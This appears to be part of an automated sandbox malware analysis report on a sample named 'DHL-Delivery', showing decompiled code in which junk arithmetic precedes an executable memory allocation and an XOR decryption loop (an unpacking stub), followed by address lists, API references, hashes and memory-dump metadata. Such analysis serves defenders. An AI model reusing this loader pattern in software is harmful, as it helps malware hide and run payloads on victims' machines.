				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
				 *((intOrPtr*)(_t1188 + 0x4f)) =  *((intOrPtr*)(_t1188 + 0x4f)) + _t930;
				_t931 = _t930 & 0x48b9e925;
				 *(_t931 + 0xc18366) =  *(_t931 + 0xc18366) << 0x66;
				do {
					_t931 = _t931;
					_t1132 = _t1132;
					_t1057 = _t1057 - 1;
					_t1247 = _t1247;
					_t1188 = _t1188;
					_t990 = _t990;
				} while (_t1057 != 1);
				_t1214 = 0x3fffff + _t1057;
				_t1151 = _t1132;
				_t958 =  *((intOrPtr*)(0xe76e5e));
				_t1020 =  *0xe72fb9;
				_t1275 = _t1247;
				do {
					_t1020 = _t1020;
					asm("emms");
					_t958 = _t958 - 1;
					_t1275 = _t1275;
					_t1151 = _t1151;
					_t1214 = _t1214;
				} while ( *_t958 != _t1020);
				_t975 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
				_t1172 = 0;
				_t1047 =  *((intOrPtr*)(_t958 + 0x10cc));
				_t1116 = 0xb810;
				_t1177 = _t1172 | 0x004024a5;
				_t981 = _t975;
				_t1296 = _t1275;
				do {
					_t1178 = _t1177;
					_t1120 = _t1116;
					_push(0 ^  *(_t1178 + _t1120));
					_t985 = _t981;
					_pop( *_t921);
					_t1126 = _t1120;
					 *(_t985 + _t1126) =  *(_t985 + _t1126) ^ 0xbbec9a97;
					_t1177 = _t1178;
					_t1296 = _t1296;
					_t1047 = _t1047;
					_t981 = _t985;
					_t1116 = _t1126 - 0xc + 8;
				} while (_t1116 >= 0);
				_t989 = _t981;
				_push(_t989);
				return _t989;
			}



































                        0x00401983
                        0x00401983
                        0x00401985
                        0x00401987
                        0x00401989
                        0x0040198c
                        0x0040198f
                        0x00401991
                        0x00401993
                        0x00401994
                        0x00401995
                        0x00401997
                        0x00401998
                        0x00401999
                        0x004019a0
                        0x004019a7
                        0x004019a8
                        0x004019aa
                        0x004019ad
                        0x004019af
                        0x004019b0
                        0x004019b2
                        0x004019b9
                        0x004019ba
                        0x004019bc
                        0x004019c0
                        0x004019c3
                        0x004019c9
                        0x004019ca
                        0x004019cd
                        0x004019ce
                        0x004019cf
                        0x004019d2
                        0x004019d5
                        0x004019d8
                        0x004019db
                        0x004019de
                        0x004019e1
                        0x004019e4
                        0x004019e7
                        0x004019ea
                        0x004019ed
                        0x004019f0
                        0x004019f3
                        0x004019f6
                        0x004019f9
                        0x004019fc
                        0x004019ff
                        0x00401a02
                        0x00401a05
                        0x00401a08
                        0x00401a0b
                        0x00401a0e
                        0x00401a11
                        0x00401a14
                        0x00401a17
                        0x00401a1a
                        0x00401a1d
                        0x00401a20
                        0x00401a23
                        0x00401a26
                        0x00401a29
                        0x00401a2c
                        0x00401a2f
                        0x00401a32
                        0x00401a35
                        0x00401a38
                        0x00401a3b
                        0x00401a3e
                        0x00401a41
                        0x00401a44
                        0x00401a47
                        0x00401a4a
                        0x00401a4d
                        0x00401a50
                        0x00401a53
                        0x00401a56
                        0x00401a59
                        0x00401a5c
                        0x00401a5f
                        0x00401a62
                        0x00401a65
                        0x00401a68
                        0x00401a6b
                        0x00401a6e
                        0x00401a71
                        0x00401a74
                        0x00401a77
                        0x00401a7a
                        0x00401a7d
                        0x00401a80
                        0x00401a83
                        0x00401a86
                        0x00401a89
                        0x00401a8c
                        0x00401a8f
                        0x00401a92
                        0x00401a95
                        0x00401a98
                        0x00401a9b
                        0x00401a9e
                        0x00401aa1
                        0x00401aa4
                        0x00401aa7
                        0x00401aaa
                        0x00401aad
                        0x00401ab0
                        0x00401ab3
                        0x00401ab6
                        0x00401ab9
                        0x00401abc
                        0x00401abf
                        0x00401ac2
                        0x00401ac5
                        0x00401ac8
                        0x00401acb
                        0x00401ace
                        0x00401ad1
                        0x00401ad4
                        0x00401ad7
                        0x00401ada
                        0x00401add
                        0x00401ae0
                        0x00401ae3
                        0x00401ae6
                        0x00401ae9
                        0x00401aec
                        0x00401aef
                        0x00401af2
                        0x00401af5
                        0x00401af8
                        0x00401afb
                        0x00401afe
                        0x00401b01
                        0x00401b04
                        0x00401b07
                        0x00401b0a
                        0x00401b0d
                        0x00401b10
                        0x00401b13
                        0x00401b16
                        0x00401b19
                        0x00401b1c
                        0x00401b1f
                        0x00401b22
                        0x00401b25
                        0x00401b28
                        0x00401b2b
                        0x00401b2e
                        0x00401b31
                        0x00401b34
                        0x00401b37
                        0x00401b3a
                        0x00401b3d
                        0x00401b40
                        0x00401b43
                        0x00401b46
                        0x00401b49
                        0x00401b4c
                        0x00401b4f
                        0x00401b52
                        0x00401b55
                        0x00401b58
                        0x00401b5b
                        0x00401b5e
                        0x00401b61
                        0x00401b64
                        0x00401b67
                        0x00401b6a
                        0x00401b6d
                        0x00401b70
                        0x00401b73
                        0x00401b76
                        0x00401b79
                        0x00401b7c
                        0x00401b7f
                        0x00401b82
                        0x00401b85
                        0x00401b88
                        0x00401b8b
                        0x00401b8e
                        0x00401b91
                        0x00401b94
                        0x00401b97
                        0x00401b9a
                        0x00401b9d
                        0x00401ba0
                        0x00401ba3
                        0x00401ba6
                        0x00401ba9
                        0x00401bac
                        0x00401baf
                        0x00401bb2
                        0x00401bb5
                        0x00401bb8
                        0x00401bbb
                        0x00401bbe
                        0x00401bc1
                        0x00401bc4
                        0x00401bc7
                        0x00401bca
                        0x00401bcd
                        0x00401bd0
                        0x00401bd3
                        0x00401bd6
                        0x00401bd9
                        0x00401bdc
                        0x00401bdf
                        0x00401be2
                        0x00401be5
                        0x00401be8
                        0x00401beb
                        0x00401bee
                        0x00401bf1
                        0x00401bf4
                        0x00401bf7
                        0x00401bfa
                        0x00401bfd
                        0x00401c00
                        0x00401c03
                        0x00401c06
                        0x00401c09
                        0x00401c0c
                        0x00401c0f
                        0x00401c12
                        0x00401c15
                        0x00401c18
                        0x00401c1b
                        0x00401c1e
                        0x00401c21
                        0x00401c24
                        0x00401c27
                        0x00401c2a
                        0x00401c2d
                        0x00401c30
                        0x00401c33
                        0x00401c36
                        0x00401c39
                        0x00401c3c
                        0x00401c3f
                        0x00401c42
                        0x00401c45
                        0x00401c48
                        0x00401c4b
                        0x00401c4e
                        0x00401c51
                        0x00401c54
                        0x00401c57
                        0x00401c5a
                        0x00401c5d
                        0x00401c60
                        0x00401c63
                        0x00401c66
                        0x00401c69
                        0x00401c6c
                        0x00401c6f
                        0x00401c72
                        0x00401c75
                        0x00401c78
                        0x00401c7b
                        0x00401c7e
                        0x00401c81
                        0x00401c84
                        0x00401c87
                        0x00401c8a
                        0x00401c8d
                        0x00401c90
                        0x00401c93
                        0x00401c96
                        0x00401c99
                        0x00401c9c
                        0x00401c9f
                        0x00401ca2
                        0x00401ca5
                        0x00401ca8
                        0x00401cab
                        0x00401cae
                        0x00401cb1
                        0x00401cb4
                        0x00401cb7
                        0x00401cba
                        0x00401cbd
                        0x00401cc0
                        0x00401cc3
                        0x00401cc6
                        0x00401cc9
                        0x00401ccc
                        0x00401ccf
                        0x00401cd2
                        0x00401cd5
                        0x00401cd8
                        0x00401cdb
                        0x00401cde
                        0x00401ce1
                        0x00401ce4
                        0x00401ce7
                        0x00401cea
                        0x00401ced
                        0x00401cf0
                        0x00401cf3
                        0x00401cf6
                        0x00401cf9
                        0x00401cfc
                        0x00401cff
                        0x00401d02
                        0x00401d05
                        0x00401d08
                        0x00401d0b
                        0x00401d0e
                        0x00401d11
                        0x00401d14
                        0x00401d17
                        0x00401d1a
                        0x00401d1d
                        0x00401d20
                        0x00401d23
                        0x00401d26
                        0x00401d29
                        0x00401d2c
                        0x00401d2f
                        0x00401d32
                        0x00401d35
                        0x00401d38
                        0x00401d3b
                        0x00401d3e
                        0x00401d41
                        0x00401d44
                        0x00401d47
                        0x00401d4a
                        0x00401d4d
                        0x00401d50
                        0x00401d53
                        0x00401d56
                        0x00401d59
                        0x00401d5c
                        0x00401d5f
                        0x00401d62
                        0x00401d65
                        0x00401d68
                        0x00401d6b
                        0x00401d6e
                        0x00401d71
                        0x00401d74
                        0x00401d77
                        0x00401d7a
                        0x00401d7d
                        0x00401d80
                        0x00401d83
                        0x00401d86
                        0x00401d89
                        0x00401d8c
                        0x00401d8f
                        0x00401d92
                        0x00401d95
                        0x00401d98
                        0x00401d9b
                        0x00401d9e
                        0x00401da1
                        0x00401da4
                        0x00401da7
                        0x00401daa
                        0x00401dad
                        0x00401db0
                        0x00401db3
                        0x00401db6
                        0x00401db9
                        0x00401dbc
                        0x00401dbf
                        0x00401dc2
                        0x00401dc5
                        0x00401dc8
                        0x00401dcb
                        0x00401dce
                        0x00401dd1
                        0x00401dd4
                        0x00401dd7
                        0x00401dda
                        0x00401ddd
                        0x00401de0
                        0x00401de3
                        0x00401de6
                        0x00401de9
                        0x00401dec
                        0x00401def
                        0x00401df2
                        0x00401df5
                        0x00401df8
                        0x00401dfb
                        0x00401dfe
                        0x00401e01
                        0x00401e04
                        0x00401e07
                        0x00401e0a
                        0x00401e0d
                        0x00401e10
                        0x00401e13
                        0x00401e16
                        0x00401e19
                        0x00401e1c
                        0x00401e1f
                        0x00401e22
                        0x00401e25
                        0x00401e28
                        0x00401e2b
                        0x00401e2e
                        0x00401e31
                        0x00401e34
                        0x00401e37
                        0x00401e3a
                        0x00401e3d
                        0x00401e40
                        0x00401e43
                        0x00401e46
                        0x00401e49
                        0x00401e4c
                        0x00401e4f
                        0x00401e52
                        0x00401e55
                        0x00401e58
                        0x00401e5b
                        0x00401e5e
                        0x00401e61
                        0x00401e64
                        0x00401e67
                        0x00401e6a
                        0x00401e6d
                        0x00401e70
                        0x00401e73
                        0x00401e76
                        0x00401e79
                        0x00401e7c
                        0x00401e7f
                        0x00401e82
                        0x00401e85
                        0x00401e88
                        0x00401e8b
                        0x00401e8e
                        0x00401e91
                        0x00401e94
                        0x00401e97
                        0x00401e9a
                        0x00401e9d
                        0x00401ea0
                        0x00401ea3
                        0x00401ea6
                        0x00401ea9
                        0x00401eac
                        0x00401eaf
                        0x00401eb2
                        0x00401eb5
                        0x00401eb8
                        0x00401ebb
                        0x00401ebe
                        0x00401ec1
                        0x00401ec4
                        0x00401ec7
                        0x00401eca
                        0x00401ecd
                        0x00401ed0
                        0x00401ed3
                        0x00401ed6
                        0x00401ed9
                        0x00401edc
                        0x00401edf
                        0x00401ee2
                        0x00401ee5
                        0x00401ee8
                        0x00401eeb
                        0x00401eee
                        0x00401ef1
                        0x00401ef4
                        0x00401ef7
                        0x00401efa
                        0x00401efd
                        0x00401f00
                        0x00401f03
                        0x00401f06
                        0x00401f09
                        0x00401f0c
                        0x00401f0f
                        0x00401f12
                        0x00401f15
                        0x00401f18
                        0x00401f1b
                        0x00401f1e
                        0x00401f21
                        0x00401f26
                        0x00401f29
                        0x00401fa5
                        0x00401fac
                        0x00401fb4
                        0x00401fbf
                        0x00401fc2
                        0x00401fc5
                        0x00401fc9
                        0x00402133
                        0x0040214f
                        0x0040215d
                        0x0040216c
                        0x00402170
                        0x00402173
                        0x0040217e
                        0x00402191
                        0x004021a5
                        0x004021ae
                        0x004021b8
                        0x004021bb
                        0x004021be
                        0x0040232c
                        0x0040235f
                        0x00402390
                        0x00402393
                        0x00402399
                        0x0040239d
                        0x004023a9
                        0x004023ad
                        0x004023b4
                        0x004023cc
                        0x004023f1
                        0x004023fe
                        0x0040240a
                        0x0040241b
                        0x0040241f
                        0x00402434
                        0x00402438
                        0x0040244d
                        0x00402451
                        0x00402454
                        0x00402454
                        0x0040245d
                        0x00402476
                        0x00402488

                        APIs
                        • VirtualAlloc.KERNELBASE(?,00010000,00001000,00000040,00000000), ref: 0040232C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 9f8de5d5f1f02b9313bd9b5146572e92b22ade5d0cf7224343f7f09d3e654ed8
                        • Instruction ID: 5aabb05f423539dab395de73a852fe8dc535884a1ffbbd11929aea0487438cca
                        • Opcode Fuzzy Hash: 9f8de5d5f1f02b9313bd9b5146572e92b22ade5d0cf7224343f7f09d3e654ed8
                        • Instruction Fuzzy Hash: 99E14EDFE11A1207F7452939FE693DB1ADAC7B07ABE1B46354E0966ECBE02E4B060140
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021A232D, Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2087c6a27e63b7fa2e0fd4dedd4201ee036ef35a3c1191686c63dea260606c1b
                        • Instruction ID: cc40ddd793138a96ec30f43936b04269620f5c13404d58045378c651206c4242
                        • Opcode Fuzzy Hash: 2087c6a27e63b7fa2e0fd4dedd4201ee036ef35a3c1191686c63dea260606c1b
                        • Instruction Fuzzy Hash: 39415A6DBC0306ADEF3539684DB47EB1563AF92BA0FE64429EC8683044E73684C9C602
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021A1C24, Relevance: 1.7, APIs: 1, Instructions: 168libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                          • Part of subcall function 021A56B7: LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID:
                        • API String ID: 3353482560-0
                        • Opcode ID: 5201f542a8efe7484820d177c67ea4cfba295046895727fcacf70b4860d4b826
                        • Instruction ID: bbac550384b9df06550a0de181c08787f178fe8ba4c39c90a48e906f1cf5296a
                        • Opcode Fuzzy Hash: 5201f542a8efe7484820d177c67ea4cfba295046895727fcacf70b4860d4b826
                        • Instruction Fuzzy Hash: 61418D6CAC5309FEEF352A684D397FA26579F03BA0F914125EC8653045E37689C6CA02
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A3BF2, Relevance: 1.7, APIs: 1, Instructions: 151libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: bdffd04b28d37e68753dca6142abdaddb8506ccf0b48bbaf58a95415940fa583
                        • Instruction ID: 91a18461561e07441a97340ba5bd656eb264b84ba4c9cd383fa36f5627b3311c
                        • Opcode Fuzzy Hash: bdffd04b28d37e68753dca6142abdaddb8506ccf0b48bbaf58a95415940fa583
                        • Instruction Fuzzy Hash: 4241B16CBC5302DEDF38197888B47EA22979F06760F96457ADCA7C7189E321C4C4CB02
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A5701, Relevance: 1.6, APIs: 1, Instructions: 149libraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID:
                        • API String ID: 3353482560-0
                        • Opcode ID: cf000c050a4f2df0128dbdcb66a8ae6a919d5dbcd7d3e60f0c067e714a1caed2
                        • Instruction ID: ac652cc36cefac49bfa952468d3f2aa44a93a5b27c46a4786084793bd32f2287
                        • Opcode Fuzzy Hash: cf000c050a4f2df0128dbdcb66a8ae6a919d5dbcd7d3e60f0c067e714a1caed2
                        • Instruction Fuzzy Hash: 70419C7568A3D6CEC721DE7488B53D63BA3AF62540FC4409DC8828B196C7328606CBA7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021A574C, Relevance: 1.6, APIs: 1, Instructions: 136libraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
